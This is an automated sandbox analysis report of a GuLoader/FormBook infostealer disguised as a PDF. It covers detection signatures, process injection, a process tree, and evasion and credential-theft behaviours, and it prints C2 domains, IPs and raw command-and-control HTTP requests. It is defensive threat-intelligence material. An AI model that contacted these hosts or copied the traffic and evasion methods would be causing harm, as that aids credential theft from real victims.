Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe

Overview

General Information

Sample name:S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
renamed because original name is a hash value
Original sample name:SPAR No.112024-pdf.bat.exe
Analysis ID:1562046
MD5:f33b6e1067bf27d4bea237206532881e
SHA1:5602bb70d47fb5f8061688b62b6f9b3bafd1a4bc
SHA256:2ab9083b17140ee82b2d96fceecfc3ad8c286b320222b074719fe7a1852ab91a
Tags:batexegeoGuLoaderTURuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" MD5: F33B6E1067BF27D4BEA237206532881E)
    • S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" MD5: F33B6E1067BF27D4BEA237206532881E)
      • cXGDMXIloFhOE.exe (PID: 5592 cmdline: "C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 2708 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • cXGDMXIloFhOE.exe (PID: 3496 cmdline: "C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4108 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:09:48.405139+010020507451Malware Command and Control Activity Detected192.168.2.449839195.110.124.13380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:09:05.328915+010028032702Potentially Bad Traffic192.168.2.449743103.83.194.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T07:10:05.322973+010028554641A Network Trojan was detected192.168.2.449875104.21.95.16080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeVirustotal: Detection: 15%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49839 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 104.21.95.160:80
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
            Source: Joe Sandbox ViewIP Address: 103.83.194.50 103.83.194.50
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49743 -> 103.83.194.50:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /tk.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: enechado.ru.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
            Source: global trafficDNS traffic detected: DNS query: enechado.ru.com
            Source: global trafficDNS traffic detected: DNS query: www.officinadelpasso.shop
            Source: global trafficDNS traffic detected: DNS query: www.vayui.top
            Source: unknownHTTP traffic detected: POST /4twy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.vayui.topOrigin: http://www.vayui.topReferer: http://www.vayui.top/4twy/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0Data Raw: 73 34 32 74 5f 4e 62 78 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d Data Ascii: s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 06:09:48 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 06:10:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEwHlfkuX1XBoKn060kgOYQVkjIkdeCrBYmcS1n4baMNJm3QfEvFO4Yk3k3h8G8sxB4vf29TZj4c%2BmdukNc2eU5n87BwRj2KZtYO9XsDdgIdHL1c0MbRnJDb119sRSYA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e7f793d6f090cae-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1493&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.bin
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://enechado.ru.com/tk.binJ
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top
            Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top/4twy/
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sdchange.exe, 00000007.00000003.2801057785.000000000775E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk,4_2_32D735C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72B60 NtClose,LdrInitializeThunk,4_2_32D72B60
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_32D72C70
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_32D72DF0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D74340 NtSetContextThread,4_2_32D74340
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D73090 NtSetValueKey,4_2_32D73090
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D73010 NtOpenDirectoryObject,4_2_32D73010
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D74650 NtSuspendThread,4_2_32D74650
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72AD0 NtReadFile,4_2_32D72AD0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72AF0 NtWriteFile,4_2_32D72AF0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72AB0 NtWaitForSingleObject,4_2_32D72AB0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72BF0 NtAllocateVirtualMemory,4_2_32D72BF0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72BE0 NtQueryValueKey,4_2_32D72BE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72B80 NtQueryInformationFile,4_2_32D72B80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72BA0 NtEnumerateValueKey,4_2_32D72BA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D739B0 NtGetContextThread,4_2_32D739B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72EE0 NtQueueApcThread,4_2_32D72EE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72E80 NtReadVirtualMemory,4_2_32D72E80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72EA0 NtAdjustPrivilegesToken,4_2_32D72EA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72E30 NtWriteVirtualMemory,4_2_32D72E30
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72FE0 NtCreateFile,4_2_32D72FE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72F90 NtProtectVirtualMemory,4_2_32D72F90
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72FB0 NtResumeThread,4_2_32D72FB0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72FA0 NtQuerySection,4_2_32D72FA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72F60 NtCreateProcessEx,4_2_32D72F60
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72F30 NtCreateSection,4_2_32D72F30
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72CC0 NtQueryVirtualMemory,4_2_32D72CC0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72CF0 NtOpenProcess,4_2_32D72CF0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72CA0 NtQueryInformationToken,4_2_32D72CA0
